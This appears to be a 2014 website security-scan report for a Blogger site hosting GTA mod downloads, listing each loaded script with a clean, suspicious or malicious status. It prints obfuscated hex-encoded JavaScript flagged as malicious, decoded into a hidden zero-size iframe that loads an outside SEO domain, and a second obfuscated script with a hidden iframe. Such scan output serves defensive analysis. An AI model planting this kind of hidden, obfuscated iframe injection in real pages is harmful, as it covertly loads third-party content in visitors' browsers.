Scanned pages/files
Request | Server response | Status
http://newconceptin3d.blogspot.com.br/ | 200 OK Content-Length: 98761 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5bwww.arriados.net ...[50102 bytes skipped]... ="400" /></a></div> <div style="text-align: center;"> <span style="font-family: inherit;"><span style="font-size: x-small;"><i><span style="color: red;">Autor</span> : RkrdM</i></span></span></div> <div style="text-align: center;"> <a href="http://www.mediafire.com/download/8uotdwa87vxi9rw/Novo+Skin+Franklin+de+GTA+V+Para+GTA+San+Andreas+%5bwww.arriados.net%5D.rar" target="_blank"><img src="http://3.bp.blogspot.com/-Ei-LHkcunS0/UKqTnXp7qGI/AAAAAAAACAw/cfmvpCwE6vI/s1600/download+concept+in+3d.png" height="128" width="128" /></a></div> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'><span class='post-icons'> </span> <div class='post-share-buttons goog-inline-block'> <a cl ...[66620 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js | 200 OK Content-Length: 94020 Content-Type: text/javascript | clean |
http://static.bloggerninja.com/asset/js/jquery.nivo.slider.pack.js?ver=3.2.1 | 200 OK Content-Length: 873 Content-Type: text/html | clean |
http://ak2.imgaft.com/script/jquery-1.3.1.min.js | 200 OK Content-Length: 55287 Content-Type: application/x-javascript | clean |
http://static.bloggerninja.com/test404page.js | 200 OK Content-Length: 873 Content-Type: text/html | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11629 Content-Type: application/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24546 Content-Type: text/javascript | clean |
http://connect.facebook.net/pt_BR/all.js | 200 OK Content-Length: 163340 Content-Type: application/x-javascript | clean |
http://mundoblogger.webs.com/scripts/popupFBlikebox.js | 200 OK Content-Length: 16151 Content-Type: text/javascript | clean |
http://www.fookseo.com.br/js/80x15.js | 200 OK Content-Length: 1523 Content-Type: text/javascript | clean |
https://dl.dropboxusercontent.com/s/y9jqnu8pa14ny5v/banner.js | 200 OK Content-Length: 1219 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x5b42=["\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x65\x6F\x2E\x63\x72\x69\x65\x74\x69\x6F\x6E\x2E\x6E\x65\x74\x2F\x22\x20\x74\x61\x72\x67\x65\x74\x3D\x22\x5F\x62\x6C\x61\x6E\x6B\x22\x3E\x3C\x69\x6D\x67\x20\x61\x6C\x74\x3D\x22\x43\x72\x69\x65\x74\x69\x6F\x6E\x20\x53\x75\x70\x65\x72\x20\x53\x45\x4F\x20\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x73\x41\x76\x31\x69\x68\x61\x2E\x70\x6E\x67\x Decoded script: <a href="http://www.seo.crietion.net/" target="_blank"><img alt="Crietion Super SEO " src="http://i.imgur.com/sAv1iha.png"></a><iframe style="display:none" src="http://www.seo.crietion.net/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe> Antivirus reports:
http://dl.dropbox.com/u/59554617/pagenavi2.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Fri, 04 Apr 2014 07:15:19 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/59554617/pagenavi2.js Server: nginx Content-Type: text/html; charset=utf-8 X-RequestId: d543e92c26281cda37da993860f65cbb | clean |
http://dl.dropboxusercontent.com/u/59554617/pagenavi2.js | 200 OK Content-Length: 10266 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var _0x1728=["","\x65\x6E\x74\x72\x79","\x66\x65\x65\x64","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x24\x74","\x70\x75\x62\x6C\x69\x73\x68\x65\x64","\x74\x69\x74\x6C\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x2F\x73\x65\x61\x72\x63\x68\x3F\x75\x70\x64\x61\x74\x65\x64\x2D\x6D\x61\x78\x3D","\x26\x6D\x61\x78\x2D\x72\x65\x73\x75\x6C\x74\x73\x3D","\x3C\x73\x70\x61\x6E\x20\x63\x6C\x61\x73\x73\x3D\x22\x73\x68\x6F\x77\x70\ ...[9902 bytes skipped]... Decoded script: <iframe id="goo" width="568" frameborder="0" marginwidth="0" height="0" marginheight="0" align="top" scrolling="no"></iframe> | ||
https://www.blogger.com/static/v1/widgets/3882746423-widgets.js | 200 OK Content-Length: 89296 Content-Type: text/javascript | clean |
http://adf.ly/js/link-converter.js | 200 OK Content-Length: 28390 Content-Type: application/x-javascript | clean |
http://dl.dropbox.com/u/52601478/Jhow.js | HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Fri, 04 Apr 2014 07:15:21 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/52601478/Jhow.js Server: nginx Content-Type: text/html; charset=utf-8 X-RequestId: 2392caa80e70b813c5ea6f256bacf025 | clean |
http://dl.dropboxusercontent.com/u/52601478/jhow.js | 200 OK Content-Length: 1463 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Result:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Fri, 04 Apr 2014 07:15:13 GMT
ETag: "d45a6a82-9e3a-4710-842e-502aed30ea1c"
Server: GSE
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Apr 2014 07:15:13 GMT
Last-Modified: Wed, 19 Mar 2014 07:26:51 GMT
Alternate-Protocol: 80:quic
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: newconceptin3d.blogspot.com.br
Referer: http://www.google.com/search?q=newconceptin3d.blogspot.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newconceptin3d.blogspot.com.br
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://newconceptin3d.blogspot.com.br/
Result: newconceptin3d.blogspot.com.br is not infected or malware details are not published yet.